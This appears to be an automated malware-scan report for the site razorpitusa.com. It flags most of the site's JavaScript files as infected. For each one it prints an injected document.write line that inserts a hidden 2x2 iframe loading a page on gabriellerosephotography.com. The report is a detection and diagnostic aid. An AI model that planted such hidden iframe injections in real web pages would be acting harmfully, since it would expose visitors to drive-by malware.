Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=razorpitusa.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.razorpitusa.com/ | 200 OK Content-Length: 12201 Content-Type: text/html | clean |
http://www.razorpitusa.com/js/prototype/prototype.js | 200 OK Content-Length: 130132 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');
var Prototype = { Version: '1.6.0.3', Browser: { IE: !!(window.attachEvent && navigator.userAgent.indexOf('Opera') === -1), Opera: navigator.userAgent.indexOf('Opera') > -1, WebKit: navigator.userAgent.indexOf('AppleWebKit/') > -1, Gecko: navigator.userAgent.indexOf('Gecko') > -1 && navi ...[3914 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=679685 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685> | ||
http://www.razorpitusa.com/js/lib/ccard.js | 200 OK Content-Length: 917 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');
function validateCreditCard(s) { var v = "0123456789"; var w = ""; for (i=0; i < s.length; i++) { x = s.charAt(i); if (v.indexOf(x,0) != -1) w += x; } j = w.length / 2; k = Math.floor(j); m = Math.ceil(j) - k; c = 0; for (i=0; i<k; i++) { a = w.charAt(i*2+m) * 2; c += a > 9 ? Math.floor(a/10 + a%10) : a; } for (i=0; i<k+m; i++) c += w.charAt(i*2+1-m) * 1; return (c%10 == 0); } Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=679685 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685> | ||
http://www.razorpitusa.com/js/prototype/validation.js | 200 OK Content-Length: 37593 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');
var Validator = Class.create(); Validator.prototype = { initialize : function(className, error, test, options) { if(typeof test == 'function'){ this.options = $H(options); this._test = test; } else { this.options = $H(test); this._test = function(){return true}; } ...[3840 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=679685 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685> | ||
http://www.razorpitusa.com/js/scriptaculous/builder.js | 200 OK Content-Length: 4916 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');
var Builder = { NODEMAP: { AREA: 'map', CAPTION: 'table', COL: 'table', COLGROUP: 'table', LEGEND: 'fieldset', OPTGROUP: 'select', OPTION: 'select', PARAM: 'object', TBODY: 'table', TD: 'table', TFOOT: 'table', TH: 'table', THEAD: 'table', TR: 'table' }, ...[4042 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=679685 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685> | ||
http://www.razorpitusa.com/js/scriptaculous/effects.js | 200 OK Content-Length: 38917 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');
String.prototype.parseColor = function() { var color = '#'; if (this.slice(0,4) == 'rgb(') { var cols = this.slice(4,this.length-1).split(','); var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3); } else { if (this.slice(0,1) == '#') { if (this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + th ...[3880 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=679685 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685> | ||
http://www.razorpitusa.com/js/scriptaculous/dragdrop.js | 200 OK Content-Length: 31364 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');
if(Object.isUndefined(Effect)) throw("dragdrop.js requires including script.aculo.us' effects.js library"); var Droppables = { drops: [], remove: function(element) { this.drops = this.drops.reject(function(d) { return d.element==$(element) }); }, add: function(element) { element = $(element); var options = Object.extend({...[3905 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=679685 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685> | ||
http://www.razorpitusa.com/js/scriptaculous/controls.js | 200 OK Content-Length: 34969 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');
if(typeof Effect == 'undefined') throw("controls.js requires including script.aculo.us' effects.js library"); var Autocompleter = { }; Autocompleter.Base = Class.create({ baseInitialize: function(element, update, options) { element = $(element); this.element = element; this.update = $(update); this.hasFocus = ...[3839 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=679685 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685> | ||
http://www.razorpitusa.com/js/scriptaculous/slider.js | 200 OK Content-Length: 10503 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');
if (!Control) var Control = { }; Control.Slider = Class.create({ initialize: function(handle, track, options) { var slider = this; if (Object.isArray(handle)) { this.handles = handle.collect( function(e) { return $(e) }); } else { this.handles = [$(handle)]; } this.track = $(track); this.options = opti ...[3830 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=679685 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685> | ||
http://www.razorpitusa.com/js/varien/js.js | 200 OK Content-Length: 21708 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');
function popWin(url,win,para) { var win = window.open(url,win,para); win.focus(); } function setLocation(url){ window.location.href = url; } function setPLocation(url, setFocus){ if( setFocus ) { window.opener.focus(); } window.opener.location.href = url; } function setLanguageCode(code, fromCode){ ...[3932 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=679685 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685> | ||
http://www.razorpitusa.com/js/varien/form.js | 200 OK Content-Length: 11885 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');
VarienForm = Class.create(); VarienForm.prototype = { initialize: function(formId, firstFieldFocus){ this.form = $(formId); if (!this.form) { return; } this.cache = $A(); this.currLoader = false; this.currDataIndex = false; this.validator = new Validation(thi ...[3895 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=679685 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685> | ||
http://www.razorpitusa.com/js/varien/menu.js | 200 OK Content-Length: 4597 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');
var mainNav = function() { var main = { obj_nav : $(arguments[0]) || $("nav"), settings : { show_delay : 0, hide_delay : 0, _ie6 : /MSIE 6.+Win/.test(navigator.userAgent), _ie7 : /MSIE 7.+Win/.test(navigator.userAgent) }, ...[3160 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=679685 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685> | ||
http://www.razorpitusa.com/js/mage/translate.js | 200 OK Content-Length: 1768 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');
var Translate = Class.create(); Translate.prototype = { initialize: function(data){ this.data = $H(data); }, translate : function(){ var args = arguments; var text = arguments[0]; if(this.data.get(text)){ return this.data.get(text); } return text; }, ...[350 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=679685 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685> | ||
http://www.razorpitusa.com/js/mage/cookies.js | 200 OK Content-Length: 2786 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gabriellerosephotography.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe>');
if (!window.Mage) var Mage = {}; Mage.Cookies = {}; Mage.Cookies.expires = null; Mage.Cookies.path = '/'; Mage.Cookies.domain = null; Mage.Cookies.secure = false; Mage.Cookies.set = function(name, value){ var argv = arguments; var argc = arguments.length; var expires = (argc > 2) ? argv[2] : Mage.Cookies.expires; ...[1427 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685></iframe> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=679685 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=679685> | ||
http://www.razorpitusa.com/index.php/ | 200 OK Content-Length: 12201 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: razorpitusa.com
Result:
GET / HTTP/1.1
Host: razorpitusa.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: razorpitusa.com
Referer: http://www.google.com/search?q=razorpitusa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: razorpitusa.com
Referer: http://www.google.com/search?q=razorpitusa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.